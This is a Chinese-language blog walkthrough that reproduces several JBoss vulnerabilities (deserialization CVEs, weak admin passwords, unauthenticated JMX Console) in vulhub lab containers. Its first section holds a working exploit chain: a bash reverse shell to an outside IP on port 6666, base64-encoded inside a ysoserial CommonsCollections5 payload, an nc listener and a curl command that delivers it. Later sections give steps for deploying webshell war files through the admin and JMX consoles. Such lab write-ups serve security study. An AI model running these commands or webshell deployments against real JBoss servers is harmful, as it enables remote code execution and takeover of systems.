当前位置: 首页 > news >正文

Jboss

1 CVE-2015-7501

漏洞介绍

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象, 然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码

环境搭建

cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d
1.POC,访问地址

返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

2.下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

将反弹shell进⾏base64编码

bash -i >& /dev/tcp/114.132.92.17/6666 0>&1 YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=

java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=}|{base64,-d}| {bash,-i} ">exp.ser
3.服务器设置监听得端⼝

nc -lvvp 6666

4.执⾏命令

curl http://121.40.229.129:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

5.反弹成功

2 CVE-2017-7504

漏洞介绍

JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的
HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏ 任意代码执⾏

环境搭建

cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
1.访问漏洞地址

python3 jexboss.py -u http://121.40.229.129:8080

3 CVE-2017-12149

漏洞简述

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化,从⽽导致了漏洞

环境搭建

cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
1.访问漏洞⻚⾯

2.验证是否存在漏洞 , 访问

靶场IP/invoker/readonly

该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化

返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞

3. 使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell即可

4 Administration Console弱⼝令

漏洞描述

Administration Console管理⻚⾯存在弱⼝令,`admin:admin`,登陆后台上传war包 , getshell

环境搭建

cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
账户密码:admin:vulhub
1.登录后台

2.点击web应⽤

3.上传后⻔ shell.war

4.连接WebShell

5 低版本JMX Console未授权

漏洞描述

此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到 jmx控制台,并在其中执⾏任何功能

环境搭建

cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
1.访问
靶场IP/jmx-console/
2.这⾥我们使⽤得复现环境不存在,所以需要密码(正常环境⽆需密码直接可进⼊)

admin admin
3.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)

4.找到⻚⾯中的void addURL() 选项远程加载war包来部署。

5.制作war包 , 这⾥⽤之前制作好的 cmd.war 填写war包远程地址
6.然后跳转以下⻚⾯

7.webshell连接

6 ⾼版本JMX Console未授权

漏洞描述

JMX Console默认存在未授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚⾯, 通过部署war包 , getshell

环境搭建

cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d

因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub

1.本地搭建部署点

在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下

2.进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署
3.搭建远程部署 , 部署远程war包地址

4.然后输⼊Invoke

5.连接Webshell

相关文章:

  • [c语言日寄]枚举类型
  • Spring Boot框架中常用注解
  • 自然资源数据要素支撑场景建设
  • QEMU源码全解析 —— 块设备虚拟化(7)
  • 探秘鸿蒙 HarmonyOS NEXT:鸿蒙存储核心技术全解析
  • SLAM十四讲【四】相机与图像
  • MySQL 字符集
  • 华为昇腾AscendCL推理引擎入门
  • epoll原理以及系统调用案例分析
  • 动态规划——完全背包问题
  • 【中文翻译】第8章-The Algorithmic Foundations of Differential Privacy
  • [spring] Spring JPA - Hibernate 多表联查 3
  • 人形机器人科普
  • Unity Shader 的编程流程和结构
  • 现代前端质量保障与效能提升实战指南
  • Noteexpress插入参考文献无法对齐
  • Linux生产者消费者模型
  • 快速求出质数
  • 【算法训练】单向链表
  • pandas中新增的case_when()方法
  • 西藏阿里地区日土县连发两次地震,分别为4.8级和3.8级
  • 神舟十九号载人飞船因东风着陆场气象原因推迟返回
  • 习近平访问金砖国家新开发银行
  • 发布亮眼一季度报后,东阿阿胶股价跌停:现金流隐忧引发争议
  • 总有黑眼圈是因为“虚”吗?怎么睡才能改善?
  • 俄罗斯延长非法滞留外国人限期离境时间至9月